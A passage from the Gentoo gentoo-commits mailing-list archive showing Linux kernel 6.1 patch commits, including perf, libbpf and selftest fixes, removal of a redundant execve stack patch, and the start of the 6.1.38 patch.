++	if (bit_sz) {
++		/* bits_offset is at most 7. bit_sz is at most 128. */
++		__u8 nr_bytes = (bits_offset + bit_sz + 7) / 8;
++
++		/* When bit_sz is non zero, it is called from
++		 * btf_dump_struct_data() where it only cares about
++		 * negative error value.
++		 * Return nr_bytes in success case to make it
++		 * consistent as the regular integer case below.
++		 */
++		return data + nr_bytes > d->typed_dump->data_end ? -E2BIG : nr_bytes;
++	}
++
++	size = btf__resolve_size(d->btf, id);
+ 
+ 	if (size < 0 || size >= INT_MAX) {
+ 		pr_warn("unexpected size [%zu] for id [%u]\n",
+@@ -2370,7 +2386,7 @@ static int btf_dump_dump_type_data(struct btf_dump *d,
+ {
+ 	int size, err = 0;
+ 
+-	size = btf_dump_type_data_check_overflow(d, t, id, data, bits_offset);
++	size = btf_dump_type_data_check_overflow(d, t, id, data, bits_offset, bit_sz);
+ 	if (size < 0)
+ 		return size;
+ 	err = btf_dump_type_data_check_zero(d, t, id, data, bits_offset, bit_sz);
+diff --git a/tools/perf/arch/x86/util/Build b/tools/perf/arch/x86/util/Build
+index dbeb04cb336e0..93c3ee5f95430 100644
+--- a/tools/perf/arch/x86/util/Build
++++ b/tools/perf/arch/x86/util/Build
+@@ -10,6 +10,7 @@ perf-y += evlist.o
+ perf-y += mem-events.o
+ perf-y += evsel.o
+ perf-y += iostat.o
++perf-y += env.o
+ 
+ perf-$(CONFIG_DWARF) += dwarf-regs.o
+ perf-$(CONFIG_BPF_PROLOGUE) += dwarf-regs.o
+diff --git a/tools/perf/arch/x86/util/env.c b/tools/perf/arch/x86/util/env.c
+new file mode 100644
+index 0000000000000..3e537ffb1353a
+--- /dev/null
++++ b/tools/perf/arch/x86/util/env.c
+@@ -0,0 +1,19 @@
++// SPDX-License-Identifier: GPL-2.0
++#include "linux/string.h"
++#include "util/env.h"
++#include "env.h"
++
++bool x86__is_amd_cpu(void)
++{
++	struct perf_env env = { .total_mem = 0, };
++	static int is_amd; /* 0: Uninitialized, 1: Yes, -1: No */
++
++	if (is_amd)
++		goto ret;
++
++	perf_env__cpuid(&env);
++	is_amd = env.cpuid && strstarts(env.cpuid, "AuthenticAMD") ? 1 : -1;
++	perf_env__exit(&env);
++ret:
++	return is_amd >= 1 ? true : false;
++}
+diff --git a/tools/perf/arch/x86/util/env.h b/tools/perf/arch/x86/util/env.h
+new file mode 100644
+index 0000000000000..d78f080b6b3f8
+--- /dev/null
++++ b/tools/perf/arch/x86/util/env.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _X86_ENV_H
++#define _X86_ENV_H
++
++bool x86__is_amd_cpu(void);
++
++#endif /* _X86_ENV_H */
+diff --git a/tools/perf/arch/x86/util/evsel.c b/tools/perf/arch/x86/util/evsel.c
+index ea3972d785d10..d72390cdf391d 100644
+--- a/tools/perf/arch/x86/util/evsel.c
++++ b/tools/perf/arch/x86/util/evsel.c
+@@ -7,6 +7,7 @@
+ #include "linux/string.h"
+ #include "evsel.h"
+ #include "util/debug.h"
++#include "env.h"
+ 
+ #define IBS_FETCH_L3MISSONLY   (1ULL << 59)
+ #define IBS_OP_L3MISSONLY      (1ULL << 16)
+@@ -97,23 +98,10 @@ void arch__post_evsel_config(struct evsel *evsel, struct perf_event_attr *attr)
+ {
+ 	struct perf_pmu *evsel_pmu, *ibs_fetch_pmu, *ibs_op_pmu;
+ 	static int warned_once;
+-	/* 0: Uninitialized, 1: Yes, -1: No */
+-	static int is_amd;
+ 
+-	if (warned_once || is_amd == -1)
++	if (warned_once || !x86__is_amd_cpu())
+ 		return;
+ 
+-	if (!is_amd) {
+-		struct perf_env *env = evsel__env(evsel);
+-
+-		if (!perf_env__cpuid(env) || !env->cpuid ||
+-		    !strstarts(env->cpuid, "AuthenticAMD")) {
+-			is_amd = -1;
+-			return;
+-		}
+-		is_amd = 1;
+-	}
+-
+ 	evsel_pmu = evsel__find_pmu(evsel);
+ 	if (!evsel_pmu)
+ 		return;
+diff --git a/tools/perf/arch/x86/util/mem-events.c b/tools/perf/arch/x86/util/mem-events.c
+index f683ac702247c..efc0fae9ed0a7 100644
+--- a/tools/perf/arch/x86/util/mem-events.c
++++ b/tools/perf/arch/x86/util/mem-events.c
+@@ -4,6 +4,7 @@
+ #include "map_symbol.h"
+ #include "mem-events.h"
+ #include "linux/string.h"
++#include "env.h"
+ 
+ static char mem_loads_name[100];
+ static bool mem_loads_name__init;
+@@ -26,28 +27,12 @@ static struct perf_mem_event perf_mem_events_amd[PERF_MEM_EVENTS__MAX] = {
+ 	E("mem-ldst",	"ibs_op//",	"ibs_op"),
+ };
+ 
+-static int perf_mem_is_amd_cpu(void)
+-{
+-	struct perf_env env = { .total_mem = 0, };
+-
+-	perf_env__cpuid(&env);
+-	if (env.cpuid && strstarts(env.cpuid, "AuthenticAMD"))
+-		return 1;
+-	return -1;
+-}
+-
+ struct perf_mem_event *perf_mem_events__ptr(int i)
+ {
+-	/* 0: Uninitialized, 1: Yes, -1: No */
+-	static int is_amd;
+-
+ 	if (i >= PERF_MEM_EVENTS__MAX)
+ 		return NULL;
+ 
+-	if (!is_amd)
+-		is_amd = perf_mem_is_amd_cpu();
+-
+-	if (is_amd == 1)
++	if (x86__is_amd_cpu())
+ 		return &perf_mem_events_amd[i];
+ 
+ 	return &perf_mem_events_intel[i];
+diff --git a/tools/perf/builtin-bench.c b/tools/perf/builtin-bench.c
+index 334ab897aae3b..a5c2a6938b4e4 100644
+--- a/tools/perf/builtin-bench.c
++++ b/tools/perf/builtin-bench.c
+@@ -21,6 +21,7 @@
+ #include "builtin.h"
+ #include "bench/bench.h"
+ 
++#include <locale.h>
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <string.h>
+@@ -256,6 +257,7 @@ int cmd_bench(int argc, const char **argv)
+ 
+ 	/* Unbuffered output */
+ 	setvbuf(stdout, NULL, _IONBF, 0);
++	setlocale(LC_ALL, "");
+ 
+ 	if (argc < 2) {
+ 		/* No collection specified. */
+diff --git a/tools/perf/builtin-script.c b/tools/perf/builtin-script.c
+index 7ca238277d835..a794a3d2e47b7 100644
+--- a/tools/perf/builtin-script.c
++++ b/tools/perf/builtin-script.c
+@@ -2390,6 +2390,9 @@ out_put:
+ 	return ret;
+ }
+ 
++// Used when scr->per_event_dump is not set
++static struct evsel_script es_stdout;
++
+ static int process_attr(struct perf_tool *tool, union perf_event *event,
+ 			struct evlist **pevlist)
+ {
+@@ -2398,7 +2401,6 @@ static int process_attr(struct perf_tool *tool, union perf_event *event,
+ 	struct evsel *evsel, *pos;
+ 	u64 sample_type;
+ 	int err;
+-	static struct evsel_script *es;
+ 
+ 	err = perf_event__process_attr(tool, event, pevlist);
+ 	if (err)
+@@ -2408,14 +2410,13 @@ static int process_attr(struct perf_tool *tool, union perf_event *event,
+ 	evsel = evlist__last(*pevlist);
+ 
+ 	if (!evsel->priv) {
+-		if (scr->per_event_dump) {
++		if (scr->per_event_dump) { 
+ 			evsel->priv = evsel_script__new(evsel, scr->session->data);
+-		} else {
+-			es = zalloc(sizeof(*es));
+-			if (!es)
++			if (!evsel->priv)
+ 				return -ENOMEM;
+-			es->fp = stdout;
+-			evsel->priv = es;
++		} else { // Replicate what is done in perf_script__setup_per_event_dump()
++			es_stdout.fp = stdout;
++			evsel->priv = &es_stdout;
+ 		}
+ 	}
+ 
+@@ -2721,7 +2722,6 @@ out_err_fclose:
+ static int perf_script__setup_per_event_dump(struct perf_script *script)
+ {
+ 	struct evsel *evsel;
+-	static struct evsel_script es_stdout;
+ 
+ 	if (script->per_event_dump)
+ 		return perf_script__fopen_per_event_dump(script);
+diff --git a/tools/perf/util/dwarf-aux.c b/tools/perf/util/dwarf-aux.c
+index 623527edeac1e..b125eaadcec4d 100644
+--- a/tools/perf/util/dwarf-aux.c
++++ b/tools/perf/util/dwarf-aux.c
+@@ -1081,7 +1081,7 @@ int die_get_varname(Dwarf_Die *vr_die, struct strbuf *buf)
+ 	ret = die_get_typename(vr_die, buf);
+ 	if (ret < 0) {
+ 		pr_debug("Failed to get type, make it unknown.\n");
+-		ret = strbuf_add(buf, " (unknown_type)", 14);
++		ret = strbuf_add(buf, "(unknown_type)", 14);
+ 	}
+ 
+ 	return ret < 0 ? ret : strbuf_addf(buf, "\t%s", dwarf_diename(vr_die));
+diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile
+index 0465ddc81f352..3b57fbf8fff4a 100644
+--- a/tools/testing/selftests/bpf/Makefile
++++ b/tools/testing/selftests/bpf/Makefile
+@@ -85,8 +85,7 @@ TEST_GEN_PROGS_EXTENDED = test_sock_addr test_skb_cgroup_id_user \
+ 	test_lirc_mode2_user xdping test_cpp runqslower bench bpf_testmod.ko \
+ 	xskxceiver xdp_redirect_multi xdp_synproxy veristat
+ 
+-TEST_CUSTOM_PROGS = $(OUTPUT)/urandom_read $(OUTPUT)/sign-file
+-TEST_GEN_FILES += liburandom_read.so
++TEST_GEN_FILES += liburandom_read.so urandom_read sign-file
+ 
+ # Emit succinct information message describing current building step
+ # $1 - generic step name (e.g., CC, LINK, etc);
+diff --git a/tools/testing/selftests/bpf/prog_tests/check_mtu.c b/tools/testing/selftests/bpf/prog_tests/check_mtu.c
+index 12f4395f18b37..a756760a45edb 100644
+--- a/tools/testing/selftests/bpf/prog_tests/check_mtu.c
++++ b/tools/testing/selftests/bpf/prog_tests/check_mtu.c
+@@ -183,7 +183,7 @@ cleanup:
+ 
+ void serial_test_check_mtu(void)
+ {
+-	__u32 mtu_lo;
++	int mtu_lo;
+ 
+ 	if (test__start_subtest("bpf_check_mtu XDP-attach"))
+ 		test_check_mtu_xdp_attach();
+diff --git a/tools/testing/selftests/cgroup/test_memcontrol.c b/tools/testing/selftests/cgroup/test_memcontrol.c
+index fe4f9f4302822..5a526a8e7d333 100644
+--- a/tools/testing/selftests/cgroup/test_memcontrol.c
++++ b/tools/testing/selftests/cgroup/test_memcontrol.c
+@@ -284,6 +284,7 @@ static int test_memcg_protection(const char *root, bool min)
+ 	char *children[4] = {NULL};
+ 	const char *attribute = min ? "memory.min" : "memory.low";
+ 	long c[4];
++	long current;
+ 	int i, attempts;
+ 	int fd;
+ 
+@@ -392,7 +393,8 @@ static int test_memcg_protection(const char *root, bool min)
+ 		goto cleanup;
+ 	}
+ 
+-	if (!values_close(cg_read_long(parent[1], "memory.current"), MB(50), 3))
++	current = min ? MB(50) : MB(30);
++	if (!values_close(cg_read_long(parent[1], "memory.current"), current, 3))
+ 		goto cleanup;
+ 
+ 	if (min) {
+diff --git a/tools/testing/selftests/net/rtnetlink.sh b/tools/testing/selftests/net/rtnetlink.sh
+index 275491be3da2f..cafd14b1ed2ab 100755
+--- a/tools/testing/selftests/net/rtnetlink.sh
++++ b/tools/testing/selftests/net/rtnetlink.sh
+@@ -835,6 +835,7 @@ EOF
+ 	fi
+ 
+ 	# clean up any leftovers
++	echo 0 > /sys/bus/netdevsim/del_device
+ 	$probed && rmmod netdevsim
+ 
+ 	if [ $ret -ne 0 ]; then
+diff --git a/tools/testing/selftests/rcutorture/configs/rcu/BUSTED-BOOST.boot b/tools/testing/selftests/rcutorture/configs/rcu/BUSTED-BOOST.boot
+index f57720c52c0f9..84f6bb98ce993 100644
+--- a/tools/testing/selftests/rcutorture/configs/rcu/BUSTED-BOOST.boot
++++ b/tools/testing/selftests/rcutorture/configs/rcu/BUSTED-BOOST.boot
+@@ -5,4 +5,4 @@ rcutree.gp_init_delay=3
+ rcutree.gp_cleanup_delay=3
+ rcutree.kthread_prio=2
+ threadirqs
+-tree.use_softirq=0
++rcutree.use_softirq=0
+diff --git a/tools/testing/selftests/rcutorture/configs/rcu/TREE03.boot b/tools/testing/selftests/rcutorture/configs/rcu/TREE03.boot
+index 64f864f1f361f..8e50bfd4b710d 100644
+--- a/tools/testing/selftests/rcutorture/configs/rcu/TREE03.boot
++++ b/tools/testing/selftests/rcutorture/configs/rcu/TREE03.boot
+@@ -4,4 +4,4 @@ rcutree.gp_init_delay=3
+ rcutree.gp_cleanup_delay=3
+ rcutree.kthread_prio=2
+ threadirqs
+-tree.use_softirq=0
++rcutree.use_softirq=0
+diff --git a/tools/testing/selftests/vDSO/vdso_test_clock_getres.c b/tools/testing/selftests/vDSO/vdso_test_clock_getres.c
+index 15dcee16ff726..38d46a8bf7cba 100644
+--- a/tools/testing/selftests/vDSO/vdso_test_clock_getres.c
++++ b/tools/testing/selftests/vDSO/vdso_test_clock_getres.c
+@@ -84,12 +84,12 @@ static inline int vdso_test_clock(unsigned int clock_id)
+ 
+ int main(int argc, char **argv)
+ {
+-	int ret;
++	int ret = 0;
+ 
+ #if _POSIX_TIMERS > 0
+ 
+ #ifdef CLOCK_REALTIME
+-	ret = vdso_test_clock(CLOCK_REALTIME);
++	ret += vdso_test_clock(CLOCK_REALTIME);
+ #endif
+ 
+ #ifdef CLOCK_BOOTTIME
+diff --git a/tools/testing/selftests/wireguard/netns.sh b/tools/testing/selftests/wireguard/netns.sh
+index 69c7796c7ca92..405ff262ca93d 100755
+--- a/tools/testing/selftests/wireguard/netns.sh
++++ b/tools/testing/selftests/wireguard/netns.sh
+@@ -514,10 +514,32 @@ n2 bash -c 'printf 0 > /proc/sys/net/ipv4/conf/all/rp_filter'
+ n1 ping -W 1 -c 1 192.168.241.2
+ [[ $(n2 wg show wg0 endpoints) == "$pub1	10.0.0.3:1" ]]
+ 
+-ip1 link del veth1
+-ip1 link del veth3
+-ip1 link del wg0
+-ip2 link del wg0
++ip1 link del dev veth3
++ip1 link del dev wg0
++ip2 link del dev wg0
++
++# Make sure persistent keep alives are sent when an adapter comes up
++ip1 link add dev wg0 type wireguard
++n1 wg set wg0 private-key <(echo "$key1") peer "$pub2" endpoint 10.0.0.1:1 persistent-keepalive 1
++read _ _ tx_bytes < <(n1 wg show wg0 transfer)
++[[ $tx_bytes -eq 0 ]]
++ip1 link set dev wg0 up
++read _ _ tx_bytes < <(n1 wg show wg0 transfer)
++[[ $tx_bytes -gt 0 ]]
++ip1 link del dev wg0
++# This should also happen even if the private key is set later
++ip1 link add dev wg0 type wireguard
++n1 wg set wg0 peer "$pub2" endpoint 10.0.0.1:1 persistent-keepalive 1
++read _ _ tx_bytes < <(n1 wg show wg0 transfer)
++[[ $tx_bytes -eq 0 ]]
++ip1 link set dev wg0 up
++read _ _ tx_bytes < <(n1 wg show wg0 transfer)
++[[ $tx_bytes -eq 0 ]]
++n1 wg set wg0 private-key <(echo "$key1")
++read _ _ tx_bytes < <(n1 wg show wg0 transfer)
++[[ $tx_bytes -gt 0 ]]
++ip1 link del dev veth1
++ip1 link del dev wg0
+ 
+ # We test that Netlink/IPC is working properly by doing things that usually cause split responses
+ ip0 link add dev wg0 type wireguard


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-05 20:34 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-05 20:34 UTC (permalink / raw
  To: gentoo-commits

commit:     1bfb91f619e81be1b7ba059b62cbddf0ce837bf5
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jul  5 20:33:41 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jul  5 20:33:41 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1bfb91f6

Remove redundant patch

Removed:
1800_mm-execve-mark-stack-as-growing-down.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                     |  4 --
 1800_mm-execve-mark-stack-as-growing-down.patch | 82 -------------------------
 2 files changed, 86 deletions(-)

diff --git a/0000_README b/0000_README
index 6c8d0f22..3b5aa81d 100644
--- a/0000_README
+++ b/0000_README
@@ -207,10 +207,6 @@ Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 
 
-Patch:  1800_mm-execve-mark-stack-as-growing-down.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable-rc.git
-Desc:   execve: always mark stack as growing down during early stack setup
-
 Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758

diff --git a/1800_mm-execve-mark-stack-as-growing-down.patch b/1800_mm-execve-mark-stack-as-growing-down.patch
deleted file mode 100644
index 7c71f7ea..00000000
--- a/1800_mm-execve-mark-stack-as-growing-down.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From 0140eae44accd0df8071de6487afe0921eb0d7fd Mon Sep 17 00:00:00 2001
-From: Linus Torvalds <torvalds@linux-foundation.org>
-Date: Sun, 2 Jul 2023 23:20:17 -0700
-Subject: execve: always mark stack as growing down during early stack setup
-
-commit f66066bc5136f25e36a2daff4896c768f18c211e upstream.
-
-While our user stacks can grow either down (all common architectures) or
-up (parisc and the ia64 register stack), the initial stack setup when we
-copy the argument and environment strings to the new stack at execve()
-time is always done by extending the stack downwards.
-
-But it turns out that in commit 8d7071af8907 ("mm: always expand the
-stack with the mmap write lock held"), as part of making the stack
-growing code more robust, 'expand_downwards()' was now made to actually
-check the vma flags:
-
-	if (!(vma->vm_flags & VM_GROWSDOWN))
-		return -EFAULT;
-
-and that meant that this execve-time stack expansion started failing on
-parisc, because on that architecture, the stack flags do not contain the
-VM_GROWSDOWN bit.
-
-At the same time the new check in expand_downwards() is clearly correct,
-and simplified the callers, so let's not remove it.
-
-The solution is instead to just codify the fact that yes, during
-execve(), the stack grows down.  This not only matches reality, it ends
-up being particularly simple: we already have special execve-time flags
-for the stack (VM_STACK_INCOMPLETE_SETUP) and use those flags to avoid
-page migration during this setup time (see vma_is_temporary_stack() and
-invalid_migration_vma()).
-
-So just add VM_GROWSDOWN to that set of temporary flags, and now our
-stack flags automatically match reality, and the parisc stack expansion
-works again.
-
-Note that the VM_STACK_INCOMPLETE_SETUP bits will be cleared when the
-stack is finalized, so we only add the extra VM_GROWSDOWN bit on
-CONFIG_STACK_GROWSUP architectures (ie parisc) rather than adding it in
-general.
-
-Link: https://lore.kernel.org/all/612eaa53-6904-6e16-67fc-394f4faa0e16@bell.net/
-Link: https://lore.kernel.org/all/5fd98a09-4792-1433-752d-029ae3545168@gmx.de/
-Fixes: 8d7071af8907 ("mm: always expand the stack with the mmap write lock held")
-Reported-by: John David Anglin <dave.anglin@bell.net>
-Reported-and-tested-by: Helge Deller <deller@gmx.de>
-Reported-and-tested-by: Guenter Roeck <linux@roeck-us.net>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- include/linux/mm.h | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index f5b6ef943ede2..b8ed44f401b58 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -378,7 +378,7 @@ extern unsigned int kobjsize(const void *objp);
- #endif /* CONFIG_HAVE_ARCH_USERFAULTFD_MINOR */
- 
- /* Bits set in the VMA until the stack is in its final location */
--#define VM_STACK_INCOMPLETE_SETUP	(VM_RAND_READ | VM_SEQ_READ)
-+#define VM_STACK_INCOMPLETE_SETUP (VM_RAND_READ | VM_SEQ_READ | VM_STACK_EARLY)
- 
- #define TASK_EXEC ((current->personality & READ_IMPLIES_EXEC) ? VM_EXEC : 0)
- 
-@@ -400,8 +400,10 @@ extern unsigned int kobjsize(const void *objp);
- 
- #ifdef CONFIG_STACK_GROWSUP
- #define VM_STACK	VM_GROWSUP
-+#define VM_STACK_EARLY	VM_GROWSDOWN
- #else
- #define VM_STACK	VM_GROWSDOWN
-+#define VM_STACK_EARLY	0
- #endif
- 
- #define VM_STACK_FLAGS	(VM_STACK | VM_STACK_DEFAULT_FLAGS | VM_ACCOUNT)
--- 
-cgit 
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-05 20:28 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-05 20:28 UTC (permalink / raw
  To: gentoo-commits

commit:     25387cd201c8d4fe72a2321d30fcdf209f84c544
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jul  5 20:28:46 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jul  5 20:28:46 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=25387cd2

Linux patch 6.1.38

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1037_linux-6.1.38.patch | 367 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 371 insertions(+)

diff --git a/0000_README b/0000_README
index 0d9f0d0b..6c8d0f22 100644
--- a/0000_README
+++ b/0000_README
@@ -191,6 +191,10 @@ Patch:  1036_linux-6.1.37.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.37
 
+Patch:  1037_linux-6.1.38.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.38
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1037_linux-6.1.38.patch b/1037_linux-6.1.38.patch
new file mode 100644
index 00000000..7a5cc22c
--- /dev/null
+++ b/1037_linux-6.1.38.patch
@@ -0,0 +1,367 @@
+diff --git a/Documentation/process/changes.rst b/Documentation/process/changes.rst
+index 9844ca3a71a61..c76b02d940946 100644
+--- a/Documentation/process/changes.rst
++++ b/Documentation/process/changes.rst
+@@ -60,6 +60,7 @@ openssl & libcrypto    1.0.0            openssl version
+ bc                     1.06.95          bc --version
+ Sphinx\ [#f1]_         1.7              sphinx-build --version
+ cpio                   any              cpio --version
++gtags (optional)       6.6.5            gtags --version
+ ====================== ===============  ========================================
+ 
+ .. [#f1] Sphinx is needed only to build the Kernel documentation
+@@ -174,6 +175,12 @@ You will need openssl to build kernels 3.7 and higher if module signing is
+ enabled.  You will also need openssl development packages to build kernels 4.3
+ and higher.
+ 
++gtags / GNU GLOBAL (optional)
++-----------------------------
++
++The kernel build requires GNU GLOBAL version 6.6.5 or later to generate
++tag files through ``make gtags``.  This is due to its use of the gtags
++``-C (--directory)`` flag.
+ 
+ System utilities
+ ****************
+diff --git a/Makefile b/Makefile
+index 26d73ce7e9267..57c891b8b13cc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 37
++SUBLEVEL = 38
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+index 003aa9e47085e..5a8a4cda7e987 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+@@ -2363,6 +2363,10 @@ int amdgpu_vm_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 	long timeout = msecs_to_jiffies(2000);
+ 	int r;
+ 
++	/* No valid flags defined yet */
++	if (args->in.flags)
++		return -EINVAL;
++
+ 	switch (args->in.op) {
+ 	case AMDGPU_VM_OP_RESERVE_VMID:
+ 		/* We only have requirement to reserve vmid from gfxhub */
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index af7aefe285ffd..087a4838488b2 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -401,8 +401,13 @@ bool dc_stream_adjust_vmin_vmax(struct dc *dc,
+ {
+ 	int i;
+ 
+-	if (memcmp(adjust, &stream->adjust, sizeof(struct dc_crtc_timing_adjust)) == 0)
+-		return true;
++	/*
++	 * Don't adjust DRR while there's bandwidth optimizations pending to
++	 * avoid conflicting with firmware updates.
++	 */
++	if (dc->ctx->dce_version > DCE_VERSION_MAX)
++		if (dc->optimized_required || dc->wm_optimized_required)
++			return false;
+ 
+ 	stream->adjust.v_total_max = adjust->v_total_max;
+ 	stream->adjust.v_total_mid = adjust->v_total_mid;
+@@ -2024,27 +2029,33 @@ void dc_post_update_surfaces_to_stream(struct dc *dc)
+ 
+ 	post_surface_trace(dc);
+ 
+-	if (dc->ctx->dce_version >= DCE_VERSION_MAX)
+-		TRACE_DCN_CLOCK_STATE(&context->bw_ctx.bw.dcn.clk);
+-	else
++	/*
++	 * Only relevant for DCN behavior where we can guarantee the optimization
++	 * is safe to apply - retain the legacy behavior for DCE.
++	 */
++
++	if (dc->ctx->dce_version < DCE_VERSION_MAX)
+ 		TRACE_DCE_CLOCK_STATE(&context->bw_ctx.bw.dce);
++	else {
++		TRACE_DCN_CLOCK_STATE(&context->bw_ctx.bw.dcn.clk);
+ 
+-	if (is_flip_pending_in_pipes(dc, context))
+-		return;
++		if (is_flip_pending_in_pipes(dc, context))
++			return;
+ 
+-	for (i = 0; i < dc->res_pool->pipe_count; i++)
+-		if (context->res_ctx.pipe_ctx[i].stream == NULL ||
+-		    context->res_ctx.pipe_ctx[i].plane_state == NULL) {
+-			context->res_ctx.pipe_ctx[i].pipe_idx = i;
+-			dc->hwss.disable_plane(dc, &context->res_ctx.pipe_ctx[i]);
+-		}
++		for (i = 0; i < dc->res_pool->pipe_count; i++)
++			if (context->res_ctx.pipe_ctx[i].stream == NULL ||
++					context->res_ctx.pipe_ctx[i].plane_state == NULL) {
++				context->res_ctx.pipe_ctx[i].pipe_idx = i;
++				dc->hwss.disable_plane(dc, &context->res_ctx.pipe_ctx[i]);
++			}
+ 
+-	process_deferred_updates(dc);
++		process_deferred_updates(dc);
+ 
+-	dc->hwss.optimize_bandwidth(dc, context);
++		dc->hwss.optimize_bandwidth(dc, context);
+ 
+-	if (dc->debug.enable_double_buffered_dsc_pg_support)
+-		dc->hwss.update_dsc_pg(dc, context, true);
++		if (dc->debug.enable_double_buffered_dsc_pg_support)
++			dc->hwss.update_dsc_pg(dc, context, true);
++	}
+ 
+ 	dc->optimized_required = false;
+ 	dc->wm_optimized_required = false;
+@@ -3869,12 +3880,9 @@ void dc_commit_updates_for_stream(struct dc *dc,
+ 			if (new_pipe->plane_state && new_pipe->plane_state != old_pipe->plane_state)
+ 				new_pipe->plane_state->force_full_update = true;
+ 		}
+-	} else if (update_type == UPDATE_TYPE_FAST && dc_ctx->dce_version >= DCE_VERSION_MAX) {
++	} else if (update_type == UPDATE_TYPE_FAST) {
+ 		/*
+ 		 * Previous frame finished and HW is ready for optimization.
+-		 *
+-		 * Only relevant for DCN behavior where we can guarantee the optimization
+-		 * is safe to apply - retain the legacy behavior for DCE.
+ 		 */
+ 		dc_post_update_surfaces_to_stream(dc);
+ 	}
+diff --git a/drivers/nubus/proc.c b/drivers/nubus/proc.c
+index 1fd667852271f..cd4bd06cf3094 100644
+--- a/drivers/nubus/proc.c
++++ b/drivers/nubus/proc.c
+@@ -137,6 +137,18 @@ static int nubus_proc_rsrc_show(struct seq_file *m, void *v)
+ 	return 0;
+ }
+ 
++static int nubus_rsrc_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, nubus_proc_rsrc_show, inode);
++}
++
++static const struct proc_ops nubus_rsrc_proc_ops = {
++	.proc_open	= nubus_rsrc_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++};
++
+ void nubus_proc_add_rsrc_mem(struct proc_dir_entry *procdir,
+ 			     const struct nubus_dirent *ent,
+ 			     unsigned int size)
+@@ -152,8 +164,8 @@ void nubus_proc_add_rsrc_mem(struct proc_dir_entry *procdir,
+ 		pded = nubus_proc_alloc_pde_data(nubus_dirptr(ent), size);
+ 	else
+ 		pded = NULL;
+-	proc_create_single_data(name, S_IFREG | 0444, procdir,
+-			nubus_proc_rsrc_show, pded);
++	proc_create_data(name, S_IFREG | 0444, procdir,
++			 &nubus_rsrc_proc_ops, pded);
+ }
+ 
+ void nubus_proc_add_rsrc(struct proc_dir_entry *procdir,
+@@ -166,9 +178,9 @@ void nubus_proc_add_rsrc(struct proc_dir_entry *procdir,
+ 		return;
+ 
+ 	snprintf(name, sizeof(name), "%x", ent->type);
+-	proc_create_single_data(name, S_IFREG | 0444, procdir,
+-			nubus_proc_rsrc_show,
+-			nubus_proc_alloc_pde_data(data, 0));
++	proc_create_data(name, S_IFREG | 0444, procdir,
++			 &nubus_rsrc_proc_ops,
++			 nubus_proc_alloc_pde_data(data, 0));
+ }
+ 
+ /*
+diff --git a/drivers/pci/pci-acpi.c b/drivers/pci/pci-acpi.c
+index 1698205dd73cb..7aa1c20582ab8 100644
+--- a/drivers/pci/pci-acpi.c
++++ b/drivers/pci/pci-acpi.c
+@@ -1043,6 +1043,16 @@ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ 	return false;
+ }
+ 
++static void acpi_pci_config_space_access(struct pci_dev *dev, bool enable)
++{
++	int val = enable ? ACPI_REG_CONNECT : ACPI_REG_DISCONNECT;
++	int ret = acpi_evaluate_reg(ACPI_HANDLE(&dev->dev),
++				    ACPI_ADR_SPACE_PCI_CONFIG, val);
++	if (ret)
++		pci_dbg(dev, "ACPI _REG %s evaluation failed (%d)\n",
